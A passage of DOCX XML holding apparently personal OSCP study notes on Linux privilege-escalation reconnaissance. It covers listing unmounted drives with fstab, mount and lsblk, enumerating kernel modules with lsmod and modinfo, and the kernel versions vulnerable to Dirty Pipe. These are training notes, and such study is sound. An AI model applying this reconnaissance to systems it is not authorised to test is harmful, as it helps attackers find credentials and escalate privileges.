        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x40thg3zx14g" w:id="377"/>
      <w:bookmarkEnd w:id="377"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unmounted Drives Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC1">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On most systems, drives are automatically mounted at boot time. Because of this, it's easy to forget about unmounted drives that could contain valuable information. We should always look for unmounted drives, and if they exist, check the mount permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Linux-based systems, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId907">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId908">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">mount</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list all mounted filesystems. In addition, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId909">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId910">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">/etc/fstab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file lists all drives that will be mounted at boot time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4510088" cy="4761981"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="519" name="image498.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image498.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId911"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4510088" cy="4761981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/fstab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC7">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output reveals a swap partition and the primary ext4 disk of this Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep in mind that the system administrator might have used custom configurations or scripts to mount drives that are not listed in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/fstab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. Because of this, it's good practice to not only scan </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/fstab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but to also gather information about mounted drives using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId912">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId913">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">lsblk</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to view all available disks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3767138" cy="1473047"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="312" name="image299.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image299.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId914"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3767138" cy="1473047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll notice that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sda</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> drive consists of three different numbered partitions. In some situations, showing information for all local disks on the system might reveal partitions that are not mounted. Depending on the system configuration (or misconfiguration), we then might be able to mount those partitions and search for interesting documents, credentials, or other information that could allow us to escalate our privileges or get a better foothold in the network.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_824iwobk4ycx" w:id="378"/>
      <w:bookmarkEnd w:id="378"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty pipe:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="931"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty Pipe Vulnerable: 5.8 → 5.16.10 (inclusive), 5.15 → 5.15.24, 5.10 → 5.10.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.9.0 exploited in OSCP-B .149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (18.1.2. Manual Enumeration) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another common privilege escalation technique involves exploitation of device drivers and kernel modules. We will explore actual exploitation tactics later in this Module, but first let's examine some important enumeration techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this technique relies on matching vulnerabilities with corresponding exploits, we'll need to gather a list of drivers and kernel modules that are loaded on the target. We can enumerate the loaded kernel modules using lsmod without any additional arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3481388" cy="2386939"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="395" name="image382.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image382.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId915"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3481388" cy="2386939"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we've collected the list of loaded modules and identified those, we want more information about, such as libata in the above example, we can use modinfo to find out more about the specific module. We should note that this tool requires the full path to run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3742354" cy="2185988"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="100" name="image132.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image132.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId916"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3742354" cy="2185988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/modinfo libata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we've obtained a list of drivers and their versions, we are better positioned to find any relevant exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
